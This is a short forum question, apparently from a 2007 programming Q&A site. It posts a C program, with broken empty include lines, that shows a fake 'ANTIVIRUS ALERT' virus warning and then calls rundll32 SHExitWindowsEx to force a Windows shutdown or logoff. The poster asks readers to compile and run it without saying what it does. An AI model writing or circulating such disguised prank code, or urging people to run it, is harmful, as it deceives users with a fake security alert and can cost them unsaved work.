#include
#include
#include
#include
int main()
{
printf("Press any key to continue...");
while(!kbhit());
MessageBox(0,"This file contains viruses.Do you want to quit execution.","ANTIVIRUS ALERT!!! ",MB_ICONSTOP);
system("rundll32.exe shell32.dll,SHExitWindowsEx 13");
getch();
}
2007-01-22
18:07:55
·
5 answers
·
asked by
sh
1
in
Computers & Internet
➔ Programming & Design
Please compile and run the programme..... let me know whether the its working and outcome plz.
2007-01-22
18:32:52 ·
update #1